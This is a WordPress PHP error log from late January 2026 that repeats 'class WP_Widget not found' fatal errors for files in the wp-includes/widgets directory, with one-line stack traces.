[20-Jan-2026 13:45:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[20-Jan-2026 16:02:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[20-Jan-2026 23:05:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[21-Jan-2026 01:21:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[21-Jan-2026 01:24:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Jan-2026 06:37:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Jan-2026 07:05:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[21-Jan-2026 10:19:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[21-Jan-2026 10:22:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[21-Jan-2026 10:24:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[21-Jan-2026 10:27:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[21-Jan-2026 11:00:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[21-Jan-2026 11:03:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[21-Jan-2026 11:05:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[21-Jan-2026 11:08:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[21-Jan-2026 11:10:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[21-Jan-2026 11:13:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[21-Jan-2026 11:16:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[21-Jan-2026 11:36:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[21-Jan-2026 11:39:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Jan-2026 12:05:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[21-Jan-2026 12:07:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[21-Jan-2026 12:10:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[21-Jan-2026 12:12:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[21-Jan-2026 12:15:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[21-Jan-2026 12:18:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[21-Jan-2026 12:20:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[21-Jan-2026 15:51:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[21-Jan-2026 16:04:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[21-Jan-2026 17:09:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[21-Jan-2026 17:11:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[22-Jan-2026 01:36:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[22-Jan-2026 04:15:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[22-Jan-2026 09:02:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[23-Jan-2026 01:11:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[23-Jan-2026 01:43:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[23-Jan-2026 03:51:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[23-Jan-2026 07:48:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[23-Jan-2026 11:04:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[23-Jan-2026 14:48:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[23-Jan-2026 15:33:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[23-Jan-2026 17:59:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[23-Jan-2026 20:50:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[23-Jan-2026 21:27:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[24-Jan-2026 01:48:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[24-Jan-2026 05:44:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[24-Jan-2026 06:09:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[24-Jan-2026 09:04:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[24-Jan-2026 16:27:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[24-Jan-2026 16:28:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[24-Jan-2026 22:54:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[24-Jan-2026 23:46:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[25-Jan-2026 02:28:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Jan-2026 07:26:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[25-Jan-2026 12:54:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[25-Jan-2026 17:15:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[25-Jan-2026 21:34:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[26-Jan-2026 01:53:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[26-Jan-2026 10:28:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[26-Jan-2026 12:44:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[26-Jan-2026 15:01:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[26-Jan-2026 15:15:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[26-Jan-2026 18:08:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[26-Jan-2026 19:17:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[27-Jan-2026 00:06:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[27-Jan-2026 01:44:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[27-Jan-2026 02:04:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[27-Jan-2026 02:57:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[27-Jan-2026 03:40:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[27-Jan-2026 07:04:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[27-Jan-2026 15:14:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[27-Jan-2026 15:15:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[27-Jan-2026 21:25:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[28-Jan-2026 00:13:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[28-Jan-2026 11:04:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[28-Jan-2026 11:07:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[28-Jan-2026 11:59:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[28-Jan-2026 18:05:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Jan-2026 19:40:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[28-Jan-2026 20:06:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Jan-2026 23:25:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Jan-2026 06:28:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Jan-2026 07:27:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Jan-2026 13:18:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[29-Jan-2026 14:09:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[29-Jan-2026 14:19:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[29-Jan-2026 15:14:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[30-Jan-2026 02:24:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[30-Jan-2026 06:20:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[30-Jan-2026 14:08:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[30-Jan-2026 14:15:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[30-Jan-2026 17:06:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[30-Jan-2026 19:35:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[30-Jan-2026 21:14:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[31-Jan-2026 01:35:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[31-Jan-2026 06:26:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[31-Jan-2026 12:15:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
